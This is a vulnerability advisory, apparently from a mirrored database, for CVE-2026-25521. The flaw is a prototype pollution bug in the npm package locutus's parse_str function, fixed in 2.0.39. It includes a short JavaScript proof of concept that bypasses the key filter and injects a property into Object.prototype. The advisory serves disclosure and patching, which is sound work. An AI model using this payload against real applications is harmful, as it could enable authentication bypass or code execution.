GHSA-RXRV-835Q-V5MH
Vulnerability from github – Published: 2026-02-02 22:21 – Updated: 2026-02-05 00:34Summary
A Prototype Pollution vulnerability exists in the the npm package locutus (>2.0.12). Despite a previous fix that attempted to mitigate Prototype Pollution by checking whether user input contained a forbidden key, it is still possible to pollute Object.prototype via a crafted input using String.prototype. This issue was fixed in version 2.0.39.
Details
The vulnerability resides in line 77 to 79 of https://github.com/locutusjs/locutus/blob/main/src/php/strings/parse_str.js where includes() function is used to check whether user provided input contain forbidden strings.
PoC
Steps to reproduce
- Install latest version of locutus using npm install or cloning from git
- Run the following code snippet:
String.prototype.includes = () => false;
console.log({}.polluted);
const locutus = require('locutus');
locutus.php.strings.parse_str('constructor[prototype][polluted]=yes');
console.log({}.polluted); // prints yes -> indicating that the patch was bypassed and Prototype Pollution occurred
Expected behavior
Prototype Pollution should be prevented and {} should not gain new properties. This should be printed on the console:
undefined
undefined OR throw an Error
Actual behavior
Object.prototype is polluted This is printed on the console:
undefined
yes
Impact
This is a Prototype Pollution vulnerability, which can have severe security implications depending on how locutus is used by downstream applications. Any application that processes attacker-controlled input using this locutus.php.strings.parse_str may be affected. It could potentially lead to the following problems:
1. Authentication bypass
2. Denial of service
3. Remote code execution (if polluted property is passed to sinks like eval or child_process)
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "locutus"
},
"ranges": [
{
"events": [
{
"introduced": "2.0.12"
},
{
"fixed": "2.0.39"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-25521"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-02T22:21:54Z",
"nvd_published_at": "2026-02-04T22:15:59Z",
"severity": "CRITICAL"
},
"details": "### Summary\nA Prototype Pollution vulnerability exists in the the npm package locutus (\u003e2.0.12). Despite a previous fix that attempted to mitigate Prototype Pollution by checking whether user input contained a forbidden key, it is still possible to pollute Object.prototype via a crafted input using String.prototype. This issue was fixed in version 2.0.39.\n\n### Details\nThe vulnerability resides in line 77 to 79 of https://github.com/locutusjs/locutus/blob/main/src/php/strings/parse_str.js where includes() function is used to check whether user provided input contain forbidden strings.\n\n### PoC\n\n#### Steps to reproduce\n1. Install latest version of locutus using npm install or cloning from git\n2. Run the following code snippet:\n\n```javascript\nString.prototype.includes = () =\u003e false; \nconsole.log({}.polluted);\nconst locutus = require(\u0027locutus\u0027);\nlocutus.php.strings.parse_str(\u0027constructor[prototype][polluted]=yes\u0027);\nconsole.log({}.polluted); // prints yes -\u003e indicating that the patch was bypassed and Prototype Pollution occurred\n```\n\n#### Expected behavior\nPrototype Pollution should be prevented and {} should not gain new properties.\nThis should be printed on the console:\n```\nundefined\nundefined OR throw an Error\n```\n\n#### Actual behavior\nObject.prototype is polluted\nThis is printed on the console:\n```\nundefined \nyes\n```\n\n### Impact\nThis is a Prototype Pollution vulnerability, which can have severe security implications depending on how locutus is used by downstream applications. Any application that processes attacker-controlled input using this `locutus.php.strings.parse_str` may be affected. It could potentially lead to the following problems:\n1. Authentication bypass\n2. Denial of service\n3. Remote code execution (if polluted property is passed to sinks like eval or child_process)",
"id": "GHSA-rxrv-835q-v5mh",
"modified": "2026-02-05T00:34:23Z",
"published": "2026-02-02T22:21:54Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/locutusjs/locutus/security/advisories/GHSA-rxrv-835q-v5mh"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25521"
},
{
"type": "WEB",
"url": "https://github.com/locutusjs/locutus/commit/042af9ca7fde2ff599120783e720a17f335bb01c"
},
{
"type": "PACKAGE",
"url": "https://github.com/locutusjs/locutus"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
"type": "CVSS_V4"
}
],
"summary": "locutus is vulnerable to Prototype Pollution"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.